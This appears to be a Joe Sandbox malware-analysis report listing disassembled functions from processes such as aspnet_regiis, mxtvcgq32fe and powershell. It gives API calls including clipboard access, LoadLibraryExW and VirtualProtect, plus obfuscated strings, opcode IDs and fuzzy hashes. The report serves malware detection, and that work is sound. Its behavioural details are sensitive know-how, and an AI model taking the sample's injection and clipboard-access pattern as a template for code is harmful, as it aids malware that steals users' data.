                                                                                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 025DD250
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 0c056f243609ada985b0d761c4726883afd19bdc6ef924204549baa5e675310f
                                                                                                                                                            • Instruction ID: 7d7dd055c4887773f0ecf9ee28c7337bd1503fd05f56b0a6896ad52d42502196
                                                                                                                                                            • Opcode Fuzzy Hash: 0c056f243609ada985b0d761c4726883afd19bdc6ef924204549baa5e675310f
                                                                                                                                                            • Instruction Fuzzy Hash: 2E018932E4C150CBD71D1F38A82256B7B62FB86215F14167CC88297654C6354C25CB8A
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(B11B8F15,00000000,03020900), ref: 025AA0EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: f7cded78074576f754bfca32604026a241079bc214ba0c787ecbf0486ac56a30
                                                                                                                                                            • Instruction ID: d5cd304ef8b6e716cf473303702b51771c485bddad526899f7aa64bfdb960f8c
                                                                                                                                                            • Opcode Fuzzy Hash: f7cded78074576f754bfca32604026a241079bc214ba0c787ecbf0486ac56a30
                                                                                                                                                            • Instruction Fuzzy Hash: 1411D23019D3908BC7149A20D8967AF7BE5FBEA308F18492DE0D55B641C7785509CB6A
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                            • Opcode ID: 71095753fd02128fc45c3c6d7ec24582f90635c5a24683e8fc01b13d17cbbe76
                                                                                                                                                            • Instruction ID: 2f4c8bcebd989a616507556f79cf05ee2c675fc722107de1f74743b0e8c0fe66
                                                                                                                                                            • Opcode Fuzzy Hash: 71095753fd02128fc45c3c6d7ec24582f90635c5a24683e8fc01b13d17cbbe76
                                                                                                                                                            • Instruction Fuzzy Hash: D7F0F9746193418FD794DF14C1A875ABBE1BBC5308F04C91CE4888B384DBB5954CCF82
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                            • Opcode ID: 94b9598bd82df0e150278dbe8d011a32550bca0a2ef95de7cbc11fba42a39061
                                                                                                                                                            • Instruction ID: 65543f8fc321d604edee3a041e1f37a21f20248411d0e8e37dee70a2100bba0f
                                                                                                                                                            • Opcode Fuzzy Hash: 94b9598bd82df0e150278dbe8d011a32550bca0a2ef95de7cbc11fba42a39061
                                                                                                                                                            • Instruction Fuzzy Hash: 4CF0B7B4509701CFD354DF28C1A8B1ABBF1FB89304F00880CE4998B3A0DB76A948DF82
                                                                                                                                                            APIs
                                                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 025AD2F5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeSecurity
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 640775948-0
                                                                                                                                                            • Opcode ID: 6a48b3b22d243f7413cfde5d2f5602854cf12aff4d1d9f25df35c698dd4d0f93
                                                                                                                                                            • Instruction ID: 65b595abfd71eb33361c85d635a25b201e5e3fcb92a99dd31990237a5d76c0b6
                                                                                                                                                            • Opcode Fuzzy Hash: 6a48b3b22d243f7413cfde5d2f5602854cf12aff4d1d9f25df35c698dd4d0f93
                                                                                                                                                            • Instruction Fuzzy Hash: 10E01731BE5305A7FE684918EC0BF4422435384B21F3C8654B311FE6D8D9B8B515550C
                                                                                                                                                            APIs
                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 025AD2C3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                            • Opcode ID: 874fc5aa000e1db8604b9ded9fddd23a139f90e569a37b25f7a7448ac9cb2480
                                                                                                                                                            • Instruction ID: 75f3320885753ab0cd6067d38d789b933a98a83d094be0e5d61da35dab5e5875
                                                                                                                                                            • Opcode Fuzzy Hash: 874fc5aa000e1db8604b9ded9fddd23a139f90e569a37b25f7a7448ac9cb2480
                                                                                                                                                            • Instruction Fuzzy Hash: F2D09730DC0640EBC60C792DEC0FF1A362C9302328F800618F2A2CE1D2D840AD24E169
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                            • String ID: C$C$E$F$J$M$T$[$^$_$x
                                                                                                                                                            • API String ID: 2832541153-1009912999
                                                                                                                                                            • Opcode ID: 7593a45ed8427623545b8f94f0f46bcf67a05fe1994d33ce5b98134b5b3ecf33
                                                                                                                                                            • Instruction ID: 90572d356bd96469d42a77ceb6bf44de87d114c4d7e1e95e494dd8195a7639e4
                                                                                                                                                            • Opcode Fuzzy Hash: 7593a45ed8427623545b8f94f0f46bcf67a05fe1994d33ce5b98134b5b3ecf33
                                                                                                                                                            • Instruction Fuzzy Hash: F4419E7150C3818FD311AF7CD58831FBFE1AB91219F484D2DE5C58B282E6B98649CB9B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,-$57
                                                                                                                                                            • API String ID: 0-1747932499
                                                                                                                                                            • Opcode ID: 1f587422cc7ea1e68b7cb43863cb4b3b08812cea55cedcf5f1c869b9990b3b0b
                                                                                                                                                            • Instruction ID: 263dd409794a4751e70d20b8cea41242557adffbfc7068f361e9946876b85b55
                                                                                                                                                            • Opcode Fuzzy Hash: 1f587422cc7ea1e68b7cb43863cb4b3b08812cea55cedcf5f1c869b9990b3b0b
                                                                                                                                                            • Instruction Fuzzy Hash: 09A1CBB5A08340DFD7209F25D89136BBBA2FF86358F444D2CE0C54B380E739850ACB9A
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID: $ $)$*$-$.$0$1$<$=$B$C$I$M$O$R$\$a$h$n$q$y$|$}
                                                                                                                                                            • API String ID: 2525500382-1673335896
                                                                                                                                                            • Opcode ID: f800a039e44653c745ad5d5eba600119bd0165aefc3b2095efcdd9d4e06af0f6
                                                                                                                                                            • Instruction ID: c7923cbcce6b5394bc26f3e866a092001eed417108dfb575c379cd1ed18d65db
                                                                                                                                                            • Opcode Fuzzy Hash: f800a039e44653c745ad5d5eba600119bd0165aefc3b2095efcdd9d4e06af0f6
                                                                                                                                                            • Instruction Fuzzy Hash: 8B91C66150C7C28EE3328A3C984879BBFD16BA3224F484A9ED5E94B2D3D7B54149C727
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                            • String ID: %$-$1$3$4$5$7$8$<$?
                                                                                                                                                            • API String ID: 1927566239-2306056897
                                                                                                                                                            • Opcode ID: d5cf2b609c59ff1e182d66705f291cfadb7b13f587dee277aba12dcde361ab01
                                                                                                                                                            • Instruction ID: bd8c7446d7617bf82594cac52aef47a4ebfa01cf253e5024a6ea98ab03dbf367
                                                                                                                                                            • Opcode Fuzzy Hash: d5cf2b609c59ff1e182d66705f291cfadb7b13f587dee277aba12dcde361ab01
                                                                                                                                                            • Instruction Fuzzy Hash: 85513C7050C7C18AD3398B3894997DEBFD16BA6314F084A6ED1E98B3D2C6B44645CB53
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID: !$R$S$X$]$h$m$m$|
                                                                                                                                                            • API String ID: 2610073882-107755797
                                                                                                                                                            • Opcode ID: 76334d791f58a3a1d83d8252f5a2ed5bdbd5719ae5498a69bdfa01334f2af62e
                                                                                                                                                            • Instruction ID: d5d64e7d78d3698c5fa8cbe991fdc35071e7b277986e551ab089e1a9fd8b603d
                                                                                                                                                            • Opcode Fuzzy Hash: 76334d791f58a3a1d83d8252f5a2ed5bdbd5719ae5498a69bdfa01334f2af62e
                                                                                                                                                            • Instruction Fuzzy Hash: 7141663110C7C18AD325CB78848879EFFD26BA6324F084A5DE5E10B3E6C7B98509CB63
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID: !$R$S$X$]$h$m$m$|
                                                                                                                                                            • API String ID: 2610073882-107755797
                                                                                                                                                            • Opcode ID: 9efb1a2dd90a13a0bfc7bdb090cce2e9c4772b7911e93cbd07e3a4bf123efe91
                                                                                                                                                            • Instruction ID: 32dbcd91cf0f83bf23404287f5914861c4601463b196405a19ea5757f61da034
                                                                                                                                                            • Opcode Fuzzy Hash: 9efb1a2dd90a13a0bfc7bdb090cce2e9c4772b7911e93cbd07e3a4bf123efe91
                                                                                                                                                            • Instruction Fuzzy Hash: 8B41273050C7C18AD3258A7C948875EFFD26BD6324F484A5DE1E14B3E6D7B98509CB63

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:8.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                            execution_graph 3711 2811788 3712 28117d5 VirtualProtect 3711->3712 3713 2811841 3712->3713

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 319 2811788-281183f VirtualProtect 321 2811841-2811847 319->321 322 2811848-2811884 319->322 321->322
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0281182F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001E.00000002.2220545121.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_30_2_2810000_mxtvcgq32fe.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                            • Opcode ID: 26d5927ece8423bda6b174dba79e926578299f84c399d4a495838f32d7fae26e
                                                                                                                                                            • Instruction ID: 62f068e35a5a05caef1d400715701ab9bf2f9be6ef54f1dfc75924c2f0f0a0b3
                                                                                                                                                            • Opcode Fuzzy Hash: 26d5927ece8423bda6b174dba79e926578299f84c399d4a495838f32d7fae26e
                                                                                                                                                            • Instruction Fuzzy Hash: BE3199B9D042589FCB10CFA9D584ADEFBF5BB09310F14902AE818B7350D775A945CF64

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 325 2819dd0-2819e87 VirtualProtect 327 2819e90-2819ecc 325->327 328 2819e89-2819e8f 325->328 328->327
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02819E77
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001E.00000002.2220545121.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_30_2_2810000_mxtvcgq32fe.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                            • Opcode ID: 7af6ba10954f198fb6d92f45c7ed8b0ff37e38dbd2594f3fa6cc344d93769578
                                                                                                                                                            • Instruction ID: f0f16de1d34b8a117fac4b155250b9867d18c71853cec0ab21f02cfb21c77c9b
                                                                                                                                                            • Opcode Fuzzy Hash: 7af6ba10954f198fb6d92f45c7ed8b0ff37e38dbd2594f3fa6cc344d93769578
                                                                                                                                                            • Instruction Fuzzy Hash: 083199B9D042589FCB10CFA9D584ADEFBF5BB09310F14902AE819B7350D375A945CF64
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001E.00000002.2216327148.0000000000542000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                            • Associated: 0000001E.00000002.2216289562.0000000000540000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000001E.00000002.2217426061.00000000005D2000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_30_2_540000_mxtvcgq32fe.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
                                                                                                                                                            • API String ID: 0-2264557016
                                                                                                                                                            • Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                                                                                                            • Instruction ID: c00e82d123b0ee2753dcae2422395cfa53d53eaba10d6375109a9b8d5813e31f
                                                                                                                                                            • Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                                                                                                            • Instruction Fuzzy Hash: 0E91C2B0204B818BD325CF3989917A3BFE2EF96304F19896DD5EB9B392D7346406CB51
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001E.00000002.2216327148.0000000000542000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                            • Associated: 0000001E.00000002.2216289562.0000000000540000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000001E.00000002.2217426061.00000000005D2000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_30_2_540000_mxtvcgq32fe.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                                                                                                            • API String ID: 0-720759029
                                                                                                                                                            • Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                                                                                                            • Instruction ID: a2dee2a8152af95e3fbcdd4c4c24ec94df3fb5de72fc6547fec11be2d32f5a3e
                                                                                                                                                            • Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                                                                                                            • Instruction Fuzzy Hash: 67E1FBB5A08340ABEB10DF24CC85B5BBFA4FF86704F10892CF6959B291D375D805CB92
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (hq$Hhq$Hhq$Hhq
                                                                                                                                                            • API String ID: 0-3282986207
                                                                                                                                                            • Opcode ID: 0ff6e1e502b4fa9b50e5135de3af47e3d94040f7ecbb21aa3be90442ab2254cd
                                                                                                                                                            • Instruction ID: 5c9a2c551690d3b7eaf0de9c2dce9c1ca68e98ec7883cf0e89d53ae3a9566899
                                                                                                                                                            • Opcode Fuzzy Hash: 0ff6e1e502b4fa9b50e5135de3af47e3d94040f7ecbb21aa3be90442ab2254cd
                                                                                                                                                            • Instruction Fuzzy Hash: 73C10034B042598FCB15EB78D844A6EBBF6FFC9300B1484AAD45ACB251DB34DD0ACB90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Hhq$cdq
                                                                                                                                                            • API String ID: 0-799836041
                                                                                                                                                            • Opcode ID: e0c8ffc1bba3c45c94c4626e01afa3bb31d80193152ec46e1ac291a3db4bf232
                                                                                                                                                            • Instruction ID: 2c1f7461cbf650fa354f5db5a7a4a2763f29f46ff567ab460fb1857f0ec50f50
                                                                                                                                                            • Opcode Fuzzy Hash: e0c8ffc1bba3c45c94c4626e01afa3bb31d80193152ec46e1ac291a3db4bf232
                                                                                                                                                            • Instruction Fuzzy Hash: 7261013470024A9FDB05EB78C9507AEB7EABFC9200F144029DA4ADF391DE74DD0683A1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3e907f59dcffc91107992b3ad3b93bab1782d12e335708ee4dece40adff85676
                                                                                                                                                            • Instruction ID: ceec6737b852e82adb72ec7508d87ffb8e80d64190d463e50d57f146132ecaa9
                                                                                                                                                            • Opcode Fuzzy Hash: 3e907f59dcffc91107992b3ad3b93bab1782d12e335708ee4dece40adff85676
                                                                                                                                                            • Instruction Fuzzy Hash: E2919E74A04609DFCB15CF99C494ABEFBB5FF48310B248699D81AAB3A5C735EC41CB90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a9606ba91affe86a9cdb23af182dd4ee2d0a22ca38e0e74fdb70c20e06def256
                                                                                                                                                            • Instruction ID: 7ff143c18b94d6a3962735e92e676cd20dc94e880aa1f0d869c28207f1d58ea4
                                                                                                                                                            • Opcode Fuzzy Hash: a9606ba91affe86a9cdb23af182dd4ee2d0a22ca38e0e74fdb70c20e06def256
                                                                                                                                                            • Instruction Fuzzy Hash: 1A414878A10109DFCB06CF49C498EAAFBB5FF48310B258259C816AB364C736ED51CBA0
                                                                                                                                                            Memory Dump Source
